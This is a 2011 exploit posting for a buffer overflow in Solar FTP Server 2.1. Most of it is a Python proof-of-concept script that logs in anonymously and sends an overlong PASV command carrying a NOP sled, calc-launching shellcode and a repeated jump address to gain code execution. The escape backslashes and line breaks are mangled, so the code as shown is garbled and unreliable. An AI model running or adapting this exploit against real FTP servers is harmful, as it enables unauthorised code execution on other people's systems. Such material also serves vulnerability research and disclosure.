Solar FTP Server 2.1 Buffer Overflow
Posted on 11 January 2011
# ------------------------------------------------------------------------ # Software................Solar FTP Server 2.1 # Vulnerability...........Buffer Overflow # Download................http://www.solarftp.com/ # Release Date............1/10/2011 # Tested On...............Windows XP SP3 EN # ------------------------------------------------------------------------ # Author..................John Leitch # Site....................http://www.johnleitch.net/ # Email...................john.leitch5@gmail.com # ------------------------------------------------------------------------ # # --Description-- # # A buffer overflow in Solar FTP Server 2.1 can be exploited to execute # arbitrary code. # # # --PoC-- import socket host = 'localhost' port = 21 jmp_eax = 'xBFx66x02x10' junk = 'xCCxCCxCCxCC' nop_sled = 'x90x90x90' + 'x90x90x90x90' * 2 # Calc shellcode by yours truly. Check the task manager # as the calc instance will not be visible. shell_code = "x31xC9"\n"x51"\n"x68x63x61x6Cx63"\n"x54"\n"xB8xC7x93xC2x77"\n"xFFxD0" junk2 = 'A' * 7004 bad_stuff = junk + nop_sled + shell_code + jmp_eax * 249 + junk2 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(8) print 'connecting' s.connect((host, port)) print s.recv(8192) s.send('USER anonymous ') print s.recv(8192) s.send('PASS x@x.com ') print s.recv(8192) s.send('PASV ' + bad_stuff + ' ') print s.recv(8192) s.close()
